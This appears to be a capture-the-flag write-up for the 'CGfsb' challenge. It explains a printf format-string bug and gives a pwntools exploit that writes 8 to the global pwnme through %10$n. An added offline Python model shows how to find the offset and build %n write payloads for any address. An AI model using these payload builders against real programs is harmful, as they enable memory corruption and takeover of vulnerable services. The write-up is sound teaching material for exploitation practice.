『攻防世界』: Beginner Area | CGfsb
阿新 • Published: 2020-08-04
checksec:
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)
IDA: in main, the message we type is passed to printf(&s) as the format string itself. That format-string bug lets us write to the global pwnme; once it equals 8 the program cats the flag. No PIE means pwnme sits at a fixed address, and the canary and NX are irrelevant here because nothing is overflowed and no code is executed, only a single %n write.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int buf;          // [esp+1Eh] [ebp-7Eh]
  int v5;           // [esp+22h] [ebp-7Ah]
  __int16 v6;       // [esp+26h] [ebp-76h]
  char s;           // [esp+28h] [ebp-74h]
  unsigned int v8;  // [esp+8Ch] [ebp-10h]

  v8 = __readgsdword(0x14u);                // stack canary
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  buf = 0;
  v5 = 0;
  v6 = 0;
  memset(&s, 0, 0x64u);
  puts("please tell me your name:");
  read(0, &buf, 0xAu);
  puts("leave your message please:");
  fgets(&s, 100, stdin);                    // our message, at most 99 bytes, stops at '\n'
  printf("hello %s", &buf);
  puts("your message is:");
  printf(&s);                               // format-string vulnerability: s is user controlled
  if ( pwnme == 8 )
  {
    puts("you pwned me, here is your flag:\n");
    system("cat flag");
  }
  else
  {
    puts("Thank you!");
  }
  return 0;
}
exp:
from pwn import *

io = remote('', )   # host and port of the challenge instance

# 0x804A068 is the address of pwnme (No PIE, so it is fixed).
# The 4 address bytes are printed first, 'aaaa' brings the count to 8,
# and %10$n stores that count at the address held in printf's 10th argument,
# which is the first word of the message buffer s, i.e. the pwnme address.
payload = p32(0x0804A068) + b'aaaa' + b'%10$n'

io.sendlineafter(b'name:', b'aaa')
io.sendlineafter(b'please:', payload)
io.interactive()
Note:
%n: writes the number of characters printf has output so far to the address held in the selected argument. Here %10$n selects the 10th argument, which is the first 4 bytes of the message buffer s, i.e. the pwnme address we put there; by then 4 (address) + 4 ('aaaa') = 8 characters have been printed, so pwnme becomes 8. Two things to check before sending: the address must not contain 0x0a, because fgets stops at a newline (0x0804A068 is fine), and if the offset is not known yet, send AAAA followed by .%1$p.%2$p... and look for which %k$p prints 0x41414141.
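The two steps above (locate the offset, then build the %n write) as an added example, not code from the original writeup. It is plain Python with no pwntools, so it runs offline against a small model of printf; the nine filler stack words and the echoed probe output are constructed for the example, and the "offset 10" and address 0x0804A068 are taken from the writeup. build_write() generalises the page's 'aaaa' filler to any target value by padding with %Nc.

```python
from __future__ import annotations
import re
import struct

PWNME_ADDR = 0x0804A068   # address of pwnme from the writeup (No PIE, so it is fixed)
OFFSET = 10               # printf argument index at which the message buffer s starts

# subset of printf directives the payloads use: %%, %p, %Nc, %k$p, %k$n
FMT_RE = re.compile(rb"%(?:(\d+)\$)?(\d*)([cnp%])")


def leak_probe(count: int, marker: bytes = b"AAAA") -> bytes:
    """Message used to find the offset: marker + '.%1$p.%2$p....%count$p'.
    The %k$p that prints the marker's own bytes (0x41414141) tells where the
    buffer begins in printf's argument list."""
    return marker + b"".join(b".%%%d$p" % k for k in range(1, count + 1))


def find_offset(output: bytes, marker: bytes = b"AAAA") -> "int | None":
    """Parse the program's echo of leak_probe(); return k for the first %k$p
    that printed the marker, or None if none did ('(nil)' tokens are skipped)."""
    want = struct.unpack("<I", marker)[0]          # b"AAAA" -> 0x41414141
    if marker not in output:
        return None
    body = output.split(marker, 1)[1]
    for k, tok in enumerate(body.split(b".")[1:], start=1):
        try:
            if int(tok.strip(), 16) == want:
                return k
        except ValueError:                          # "(nil)" or trailing text
            continue
    return None


def build_write(addr: int, value: int, offset: int) -> bytes:
    """Format string that writes `value` to `addr` through %offset$n. The
    address is placed first (4 characters already counted), then %Nc pads the
    output count up to `value`. For value == 8 this is the writeup's payload
    with 'aaaa' replaced by '%4c'."""
    payload = struct.pack("<I", addr)
    if any(b in payload for b in (0x00, 0x0A)):
        raise ValueError("address contains NUL or newline; fgets would truncate it")
    pad = value - len(payload)
    if pad < 0:
        raise ValueError("value is smaller than the bytes already printed")
    if pad:
        payload += b"%%%dc" % pad                   # one char padded to width `pad`
    return payload + b"%%%d$n" % offset


def cgfsb_stack(message: bytes, offset: int = OFFSET) -> list[int]:
    """Constructed stand-in for what printf(&s) sees on CGfsb's stack: nine
    made-up words, then the message buffer itself starting at argument `offset`."""
    words = [0xDEAD0000 + k for k in range(1, offset)]
    padded = message + b"\0" * (-len(message) % 4)
    return words + [w for (w,) in struct.iter_unpack("<I", padded)]


def simulate_printf(fmt: bytes, args: list[int], memory: dict[int, int]) -> bytes:
    """Model of printf for the directives in FMT_RE. Returns the bytes that
    would be printed; on %k$n the number of bytes printed so far is stored at
    the address held in argument k, which is the primitive the exploit abuses."""
    out = bytearray()
    pos, next_arg = 0, 1
    for m in FMT_RE.finditer(fmt):
        out += fmt[pos:m.start()]                    # literal text before the directive
        pos = m.end()
        k, width, conv = m.groups()
        if conv == b"%":
            out += b"%"
            continue
        if k is None:                                # sequential %c / %p use the next argument
            k, next_arg = next_arg, next_arg + 1
        else:
            k = int(k)
        arg = args[k - 1]
        if conv == b"n":
            memory[arg] = len(out) & 0xFFFFFFFF
        elif conv == b"c":
            out += bytes([arg & 0xFF]).rjust(max(int(width or b"1"), 1))
        elif conv == b"p":
            out += b"0x%x" % arg
    out += fmt[pos:]
    return bytes(out)


def pwn_locally(value: int = 8) -> int:
    """Run the writeup's two steps on the model: probe for the offset, then
    fire the %n write, and return what pwnme holds afterwards."""
    probe = leak_probe(16)
    echo = simulate_printf(probe, cgfsb_stack(probe), {})
    offset = find_offset(echo)
    assert offset == OFFSET, offset
    payload = build_write(PWNME_ADDR, value, offset)
    memory = {PWNME_ADDR: 0}
    simulate_printf(payload, cgfsb_stack(payload, offset), memory)
    return memory[PWNME_ADDR]


if __name__ == "__main__":
    print(build_write(PWNME_ADDR, 8, OFFSET))
    print("pwnme =", pwn_locally())
```

Against the real service, find_offset() is fed the text after "your message is:" and build_write() output goes where the writeup's payload does. Padding with %Nc is only sensible for small values; writing a large value with a single %n means printing that many characters, which is why real format-string writes split the value into %hn or %hhn pieces.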